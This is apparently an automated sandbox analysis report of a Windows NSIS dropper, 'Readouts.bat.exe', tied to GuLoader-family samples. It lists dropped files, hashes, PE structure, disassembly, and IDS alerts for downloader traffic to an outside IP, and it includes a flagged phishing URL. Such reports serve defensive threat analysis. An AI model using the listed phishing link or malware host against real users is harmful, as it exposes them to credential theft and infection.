	https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/naimestyles.com%2Frtwo%2Fn%2FNUaX8EOAfixpQMTfRAnHcKww/eGlzaEBub3ZvenltZXMuY29t	Get hash	malicious	HTMLPhisher	Browse	172.93.120.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll	S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Account& Payment Transfer Details_pdf.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Account& Payment Transfer Details_pdf.exe	Get hash	malicious	GuLoader	Browse
	https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exe	Get hash	malicious	Unknown	Browse
	3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe	Get hash	malicious	GuLoader	Browse
	3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe	Get hash	malicious	GuLoader	Browse
	rjustificantePago_es_180214093508pdf.exe	Get hash	malicious	GuLoader	Browse
	rjustificantePago_es_180214093508pdf.exe	Get hash	malicious	GuLoader	Browse
	CI890892.6409410669pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsrC488.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.81704362174321
Encrypted:	false
SSDEEP:	48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
MD5:	3DD80DFF583544514EEB3A5ED851A519
SHA1:	56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
SHA-256:	86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
SHA-512:	955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious, Browse Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse Filename: CI890892.6409410669pdf.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.890541747176257
Encrypted:	false
SSDEEP:	192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:	75ED96254FBF894E42058062B4B4F0D1
SHA1:	996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:	A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:	58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\frtr.jpg

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
Category:	dropped
Size (bytes):	165466
Entropy (8bit):	6.5947581943238625
Encrypted:	false
SSDEEP:	3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
MD5:	152B2AA9B4B656DF132C2E5EAD37A7D5
SHA1:	9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
SHA-256:	11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
SHA-512:	4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
Malicious:	false
Reputation:	low
Preview:	......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\lukkedagenes.fli

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	321960
Entropy (8bit):	1.240482616634199
Encrypted:	false
SSDEEP:	768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
MD5:	66087BEC9068998EE8F271F0580AB3F5
SHA1:	80980F5A1BD6DAF01263730273F945B031F75AE3
SHA-256:	248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
SHA-512:	046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
Malicious:	false
Reputation:	low
Preview:	...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\opisthocomine.nit

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	263192
Entropy (8bit):	1.2599632446975992
Encrypted:	false
SSDEEP:	768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
MD5:	0EDAE6068FC853ECD4597C0C717729E8
SHA1:	8F02F7B5B9524451D3E2FA336B898883E8707FEA
SHA-256:	FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
SHA-512:	EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
Malicious:	false
Preview:	........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Destructibility232.Hae

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	300215
Entropy (8bit):	7.60202307149698
Encrypted:	false
SSDEEP:	6144:oVqhTWP564sPg9kuKsookY0xGDqAaToGG9h7kLPIHDm9J5/3b6DAg:oypsookJMQomdGDAg
MD5:	8499C7BD10DABAF8DF8745B57F612F73
SHA1:	9C25FFAFDF9D6AF07EB5BD7B8A897509E65DE3F5
SHA-256:	2F7D4CD8374D5F7EE7D59BF06036E3C4E1035455D95E90D04AE0DA12C3AA3F3C
SHA-512:	7456BEE05A7DAEF8DE41C39105955ED83CCBEB409A32F1E97CC822FB9BC4C0054020E32FFAABE7DB95CB7DD48D0DFE85A320D96461F83452D579A51903E43484
Malicious:	false
Preview:	...v.....RR..........ooo.LLL..............X.......KKKKKK....V......CCCCC.......6666666....X...........Z..11................................!.fffff.....^^^..S.%.........R.f.......o........w.l................#..............,...f...yyyyyy.............PPP.cccc...y......mmmmmm............0.......y....h.kk.........................FFFF...====.......o.....66..W..................................[...4..............``......QQQQQ..............................<<..............mmmm.....C.))).a.....................<...1.vv....../////......................8......(....e..........................QQ....yyyyy................#......................5..............l.........W...nn......W.............YY......-.......FF.NN.......MM................>>........LLL..............uuuuuuuuu..../.e.T..........77.......""".......................R..r.....i.........``......................................c.....{......uuuu.........44.......\|..........C.......OO................E.(.G..............)....V.....q....;............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Fraggings79.Bou

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	119900
Entropy (8bit):	2.6586250127926325
Encrypted:	false
SSDEEP:	1536:6jdC216hYLvIhMoEneRjeYCnZZH9yaLj6Ovo7UD9D5yv:S6LUJNI
MD5:	F0EE2E4C32204D0D0C8D15CB8AD658FD
SHA1:	25ABC78C1F4D4A50C5630C44554C221E72487DF0
SHA-256:	B6464B7D7E39E076B3D4B51593FA7681493B367BB87C760D572179CFE01356BF
SHA-512:	D5EAB7411129B7A16D79D5A8F2724469AA6DC6AEEFCF3B829EA6246EBCC6875D1E4254922218761D06C45A2506E2D95A0F96479788CDD63524D2066D18548484
Malicious:	false
Preview:	0000000085858585000000005A00B8000000060606060000000000B80000515151510000000000B8B8000000320000A200C7C7C7C70000C60000000202020202004E4E0000B40000C500006B6B6B00005D00A1A1A1A100000F0F0F0F00000000AD00D2D2005F5F0000F8008585000606060000000000DC00BB00005600BD0000760000001A00050023232300000000F1F10000000000003600250000390000000000009C9C00525252007B00E6E6E600000000373700F5F5008A00BD00860000DD0000CCCC00002D00777700E6000047470000009600CDCDCDCDCD0000160000C1C1003A00000000008500BCBCBC000000000000009200AD0000006D6D6D6D00B0006D00939300007800AE0000410000080808002E2E0000FF00004C4C00373737370000CECE0000646464000000525252525252520000000300005A5A5A5A00909090000036360000F6F6000700FBFBFB00CACA0000710000F1F1F10000ABAB00130000000000000000000000001A00000000C9006F000000CECE00002700000000A800EA00270000009500005E000000007D7D0000FF00F800009B00002B000017171700910000006200000000FEFE0000009300EEEEEEEE00000000000000940000000000006F000069000000000000ADADAD000000F600FAFA007B7B7B7B004D006A00BB0000000000000000004D00000066

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\defencives.pol

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	455315
Entropy (8bit):	1.2477113828127742
Encrypted:	false
SSDEEP:	1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
MD5:	761F2A757CD380F71E205335CE088495
SHA1:	7E1C38708629925DF64A30EB0B722A7C44FA6150
SHA-256:	56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
SHA-512:	5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
Malicious:	false
Preview:	.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................

C:\Windows\Resources\0809\mysterist.ini

Download File

Process:	C:\Users\user\Desktop\Readouts.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.006841738213845
Encrypted:	false
SSDEEP:	3:kQMicv7Wz+v:clvSz+v
MD5:	8674B487F44FE91156094E810B1A3128
SHA1:	27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
SHA-256:	4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
SHA-512:	4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
Malicious:	false
Preview:	[parsimoniously]..Vesigia=unassessed..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.195535478027114
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Readouts.bat.exe
File size:	993'977 bytes
MD5:	492707a5e753b9c5faa6a9829e065775
SHA1:	7a48c9ae447780551a9714b5cccde57f16094e01
SHA256:	8a0a6bad685a0e4517d2f1e8f70fff1195c78470e467255dfeb1c3f7ec922514
SHA512:	e7ab1808dadb1a1da12ac66e6f9c631a5ca58b4575bebfba21aa6b6907153bd8e4af2904e3039a77f0a4f9bc94cd408f108c05181878270c5446862b01ffa707
SSDEEP:	24576:oewAoAZIk1OYV8pC0SUGKSGnx7eq0xQUsHVSm:CAFLErOUGKSe5eq0xQhHs
TLSH:	3925D002EF59C787C2FA6E7449F6B7052A2DCBC998D38F02E64568D8F670F5874C8684
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

File Icon


Icon Hash:	c5cdc989d5cde097

Static PE Info

General

Entrypoint:	0x403359
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007FF650CEAA93h
push ebx
call 00007FF650CEDD45h
cmp eax, ebx
je 00007FF650CEAA89h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FF650CEDCBFh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FF650CEAA6Ch
push 0000000Ah
call 00007FF650CEDD18h
push 00000008h
call 00007FF650CEDD11h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007FF650CEDD05h
cmp eax, ebx
je 00007FF650CEAA91h
push 0000001Eh
call eax
test eax, eax
je 00007FF650CEAA89h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x5ab18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x62a5	0x6400	f4cff166abb4376522cf86cbd302f644	False	0.658984375	data	6.431390019180314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	7d0d44c89e64b001096d8f9c60b1ac1b	False	0.4928385416666667	data	3.90464114821524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x25000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0x5ab18	0x5ac00	8e289f0503c71e1dae735f54bd537b3d	False	0.3740799328512397	data	4.762577612489826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x504a8	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	English	United States	0.35952525372074445
RT_ICON	0x924d0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.3869188453803383
RT_ICON	0xa2cf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.5096473029045643
RT_ICON	0xa52a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.6343808630393997
RT_ICON	0xa6348	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.5815565031982942
RT_ICON	0xa71f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.6877049180327869
RT_ICON	0xa7b78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.723826714801444
RT_ICON	0xa8420	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	English	United States	0.6359447004608295
RT_ICON	0xa8ae8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	English	United States	0.2725609756097561
RT_ICON	0xa9150	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.4602601156069364
RT_ICON	0xa96b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.7606382978723404
RT_ICON	0xa9b20	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.34139784946236557
RT_ICON	0xa9e08	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 0	English	United States	0.39549180327868855
RT_ICON	0xa9ff0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.44594594594594594
RT_DIALOG	0xaa118	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0xaa1d0	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0xaa318	0x100	data	English	United States	0.5234375
RT_DIALOG	0xaa418	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xaa538	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xaa598	0xca	data	English	United States	0.5792079207920792
RT_VERSION	0xaa668	0x21c	data	English	United States	0.5314814814814814
RT_MANIFEST	0xaa888	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T07:16:38.511353+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:16:49.173667+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:16:59.573665+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:09.980013+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:20.386353+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:30.996054+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:41.401856+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:17:52.013444+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:02.420488+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:12.827458+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:23.432703+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:34.042247+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP
2024-11-25T07:18:44.448641+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	172.93.121.126	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 07:16:36.756593943 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:37.235846043 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:37.235977888 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:37.501250029 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:37.620791912 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:38.511192083 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:38.511353016 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:38.755135059 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:38.755217075 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:48.777443886 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:48.898072958 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:49.173536062 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:49.173666954 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:59.178579092 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:16:59.298018932 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:59.573565006 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:16:59.573664904 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:09.584342957 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:09.703879118 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:09.979950905 CET	80	49736	172.93.121.126	192.168.2.4
Nov 25, 2024 07:17:09.980012894 CET	49736	80	192.168.2.4	172.93.121.126
Nov 25, 2024 07:17:19.990755081 CET	49736	80	192.168.2.4	172.93.121.126
